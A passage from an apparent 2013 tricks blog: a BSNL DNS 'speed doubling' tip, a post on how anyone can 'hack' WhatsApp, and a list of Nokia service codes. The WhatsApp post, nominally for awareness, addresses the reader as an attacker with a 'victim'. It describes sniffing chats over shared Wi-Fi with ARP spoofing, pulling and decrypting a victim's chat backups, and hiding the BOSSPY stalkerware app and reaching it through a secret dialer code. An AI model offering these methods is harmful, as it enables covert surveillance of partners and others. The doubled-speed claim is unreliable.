This Trick Is About BSNl Broadband ” How To Increase Broadband Speed “. In This Trick Really Helpful For All Bsnl Broadband Users, My Broadband Speed Is Increase Up to 2 times Better Than Your Previous Speed. Its Depend On DNS Server. So Friends Use This Trick And Enjoy Your Bsnl Broadband Speed Up To 2 Times. For Latest Tricks And Tips About Free Sms, Free Gprs, Free Internet Tricks And More Visit Us Daily.

Increase Your Speed 2 times Better

Follow These Steps To Do This Tricks ::-

Go To Control Panel.

Click On Network And Internet And Open Network Connectios.

Now A Dialogue Box Open And Showing All Network Connections Opened.

Select LAN Option.

Click Right Button And Go To Properties.

Dual Click, On Internet Protocol Version { TCP/IPv4 } And Newly Open Dialogue Box At Underneath Select “Use The Following DNS Address “.

And Fill This 2 DNS Address In Two Empty Fields:

208.67.222.222 Or 208.67.220.220

And You Are Done It.Your Bsnl Broadband Speed Is Increased And DNS Servers Are Alerted.

Thursday, October 17, 2013

Learn How Any One Can HACK Your Whatsapp

How any one hack your Whatsapp.

Hello everyone...!!!!!!!!!

So in this blog i am going to make you aware that how anyone can hack your whatsapp and read all your personal stuff and messages.

You must be thinking that i am joking that " how any one can hack your whatsapp ". The answer is YES anyone can hack your whatsapp account and operate it without you being known. They can easily access all your stuff and can also send messages, pics, video etc behalf on you and you will just keep wondering that when you sended all this...????? :-?

So i will be sharing some of the hacks and software through which anyone can actually hack your whatsapp.

So lets get started with 1st trick in which a software is used to hack whatsapp

NOTE:- That the above software i am telling about is an android app which need permission of superUser which means the phone must be rooted.

Let's Get Started
1. WhatsApp Sniffer

WhatsAppSniffer is a tool for root terminals to read WhatsApp conversations of a WIFI network (Open, WEP, WPA/WPA2).
It captures the conversations, pictures / videos and coordinates that aresent or received by an Android phone, iPhone or Nokia on the same WIFI network.
It has not been tested with Windows Phone terminals.
It can't read the messages written or received by the BlackBerry's, as they use their own servers and not WhatsApp's.
This application is designed to demonstrate that the security of WhatsApp's communications is null.
WhatsAppSniffer just use the TCPDump program which reads all the WIFI network packets and filters those which has origin or destination WhatsApp's servers.
All messages are in plain text, so it does not decrypt anything, complying fully with the legal terms of WhatsApp (3.C: "While we do not disallow the use of sniffers Such as Ethereal, tcpdump or HttpWatch in general, Any we do going efforts to disallow reverse-engineer our system, our protocols, or explore outside the boundaries of the ordinary requests made by clients WhatsApp .... ")
For WPA/WPA2 encrypted networks, if uses the tool ARPSpoof (optional).

Requirements :-
1. A Rooted Android Device.

2. Your Victim Should Use Same Wi-Fi Through Which you are connected.

3. WhatsAppSniffer Donate ★ root v1.03.

So beware when you are using whatsapp in public or local WiFi connection. Don't be happy if you find any open WiFi connection in your areas but it may be the trick of a attacker to hack your whatsapp account and read all your personal stuff.

2. Decrypting Conversations

The Second Trick through which hacker can hack your whatsapp account is by decrypting your conversation which is kept in mobile SD card or the backup which you create for backuping your messages and stuff.

For different mobile OS there are different ways. Below are the steps for Android, Iphone, Blackberry & Nokia(no info available yet for nokia)

have your victim locked his whatsapp? or you want all his conversation on your PC. Generally for security reasons WhatsApp encrypt Conversation while taking backup in SD Card or Phone Memory.But i have found a tool on XDA that claims to decrypt all the whatsapp conversation down to your PC.

If you have some access over his device you can also send files from Bluetooth to your device and later read all the conversations.

This tool is called WhatsApp Xtract and for this all credits goes to ztedd.

Some general advice on how to backup Whatsapp and get the database file:

Android :-

- In Whatsapp go to settings - more - Backup Chats
- Copy the folder "Whatsapp" on the SD card to your backup location (e.g., PC)
- (ideally also) use the app Titanium Backup to backup the full whatsapp application together with its data, copy the backup from the folder "TitaniumBackup" on the SD card to your backup location (e.g., PC)
- Use this tool Whatsapp Backup Extractor (download in this thread) to show the chats in a friendly readable format. The necessary files "wa.db" and "msgstore.db" you will find inside the Titanium Backup archive "com.whatsapp-[Date]-[some digits].tar.gz", alternatively (without Titanium Backup) you can use the msgstore.db.crypt file from the folder Whatsapp/Databases on the SD card.

iPhone :-

- use Itunes to create an unencrypted Backup
- use an Iphone Backup Tool to get the file net.whatsapp.WhatsApp/Documents/ChatStorage.sqlite, e.g. I-Twin or Iphone Backup Extractor. Make sure to create an unencrypted backup with Itunes, as these tools can't handle encrypted backups. Another possibility are forensic tools like UFED Physical Analyzer.)

Blackberry :-
- sync your blackberry with desktop manager and then copy the messagestore.db file from SD
- however, it seems that this file is encrypted? Currently we don't know how to get the unencrypted messagestore.db file
- Blackberry not supported yet!

Nokia- not known yet
- Nokia not supported yet!!!

So before giving your phone to anyone think twicely and also keep all your backup safe so that no one can hack your personal stuff and messages. :-)

3. Using Spywares :-
Another method we are going to see is that by using 3rd party application and software anyone can easily not only hack your whatsapp but it can track GPS, view your lock screen password, view your messages, call records etc.

There are many software available in the market to do such thinks but the truth is that they all are paid app but i have come across a 3rd party software which is absolutely free of cost and that is call BOSSPY. It is available only for android and Iphone till now.
I have use it in my S3 and it works like a charm to see whether its really working or not and i was shocked to see that it can actually track all my call records, in/out text messages, it can track me via GPS and the great and very dangerous think about this app is that it is totally invisible means you cannot find this app in app drawer but it can be found under setting => accessibility => Service tab. There you will find this app. To start this app we need to dial the default code which is 123456 in android dialer. For further detail visit the official page of BOSSPY.

So guys that all for today.
In next post i will be sharing some other dangerous method through which anyone can hack your whatsapp

Till then stay tune to my blog.

if i have help you in any way please do comment and share it as much as you want to protect your dear one from being hacked by someone.

STAY SAFE AND BE AWARE

Wednesday, September 25, 2013

NOKIA UNIVERSAL CODES

NOKIA
Nokia Universal Codes
Code Description :
These Nokia codes will work on most Nokia Mobile Phones

(1) *3370# Activate Enhanced Full Rate Codec (EFR) – Your phone uses the best sound quality but talk time is reduced my approx. 5%

(2) #3370# Deactivate Enhanced Full Rate Codec (EFR) OR *3370#

(3) *#4720# Activate Half Rate Codec – Your phone uses a lower quality sound but you should gain approx 30% more Talk Time.
(4) *#4720# Deactivate Half Rate Codec.

(5) *#0000# Displays your phones software version, 1st Line : Software Version, 2nd Line : Software Release

Date, 3rd Line : Compression Type.

(6) *#9999# Phones software version if *#0000# does not work.

(7) *#06# For checking the International Mobile Equipment Identity (IMEI Number).

(#pw+1234567890+1# Provider Lock Status. (use the “*” button to obtain the “p,w”and “+” symbols).

(9) #pw+1234567890+2# Network Lock Status. (use the “*” button to obtain the “p,w”and “+” symbols).

(10) #pw+1234567890+3# Country Lock Status. (use the “*” button to obtain the “p,w”and “+” symbols).

(11) #pw+1234567890+4# SIM Card Lock Status. (use the “*” button to obtain the “p,w” Go to Topand “+” symbols).

(12) *#147# (vodafone) this lets you know who called you last.

(13) *#1471# Last call (Only vodofone).

(14) *#21# Allows you to check the number that “All Calls” are diverted to

(15) *#2640# Displays security code in use.

(16) *#30# Lets you see the private number.

(17) *#43# Allows you to check the “Call Waiting” status of your phone.

(18) *#61# Allows you to check the number that “On No Reply” calls are diverted to.

(19) *#62# Allows you to check the number that “Divert If Unreachable (no service)” calls are diverted to.

(20) *#67# Allows you to check the number that “On Busy Calls” are diverted to.

(21) *#67705646# Removes operator logo on 3310 & 3330.

(22) *#73# Reset phone timers and game scores.

(23) *#746025625# Displays the SIM Clock status, if your phone supports this power saving feature “SIM Clock Stop

Allowed”, it means you will get the best standby time possible.

(24) *#7760# Manufactures code.

(25) *#7780# Restore factory settings.

(26) *#8110# Software version for the nokia 8110.

Go to Top

(27) *#92702689# Displays – 1.Serial Number, 2.Date Made, 3.Purchase Date, 4.Date of last repair (0000 for no

repairs), 5.Transfer User Data. To exit this mode you need to switch your phone off then on again. ( Favourite )

(28) *#94870345123456789# Deactivate the PWM-Mem.

(29) **21*number# Turn on “All Calls” diverting to the phone number entered.

(30) **61*number# Turn on “No Reply” diverting to the phone number entered.

(31) **67*number# Turn on “On Busy” diverting to the phone number entered.

(32) 12345 This is the default security code.

press and hold # Lets you switch between lines

NOKIA5110/5120/5130/5190

IMEI number: * # 0 6 #
Software version: * # 0 0 0 0 #
Simlock info: * # 9 2 7 0 2 6 8 9 #
Enhanced Full Rate: * 3 3 7 0 # [ # 3 3 7 0 # off]
Half Rate: * 4 7 2 0 #
Provider lock status: #pw+1234567890+1
Network lock status #pw+1234567890+2
Provider lock status: #pw+1234567890+3
SimCard lock status: #pw+1234567890+4
NOKIA 6110/6120/6130/6150/6190
IMEI number: * # 0 6 #
Software version: * # 0 0 0 0 #
Simlock info: * # 9 2 7 0 2 6 8 9 #
Enhanced Full Rate: * 3 3 7 0 # [ # 3 3 7 0 # off]
Half Rate: * 4 7 2 0 #

NOKIA3110

IMEI number: * # 0 6 #
Software version: * # 0 0 0 0 # or * # 9 9 9 9 # or * # 3 1 1 0 #
Simlock info: * # 9 2 7 0 2 6 8 9 #
NOKIA 3330
*#06#
This will show your warranty details *#92702689#
*3370#
Basically increases the quality of calling sound, but decreases battery length.
#3370#
Deactivates the above
*#0000#
Shows your software version
*#746025625#This shows if your phone will allow sim clock stoppage
*4370#
Half Rate Codec activation. It will automatically restart
#4370#
Half Rate Codec deactivation. It will automatically restart
Restore Factory Settings
To do this simply use this code *#7780#
Manufacturer Info
Date of Manufacturing *#3283#
*3001#12345# (TDMA phones only)

This will put your phone into programming mode, and you’ll be presented with the programming menu.

2) Select “NAM1″
3) Select “PSID/RSID”
4) Select “P/RSID 1″
Note: Any of the P/RSIDs will work
5) Select “System Type
” and set it to Private
6) Select “PSID/RSID” and set it to 1
7) Select “Connected System ID”
Note: Enter your System ID for Cantel, which is 16401 or 16423. If you don’t know yours,
ask your local dealer for it.
Â Select “Alpha Tag”
9) Enter a new tag, then press OK
10) Select “Operator Code (SOC)” and set it to 2050
11) Select “Country Code” and set it to 302 for Canada, and 310 for the US.
12) Power down the phone and power it back on again
ISDN Code
To check the ISDN number on your Nokia use this code *#92772689#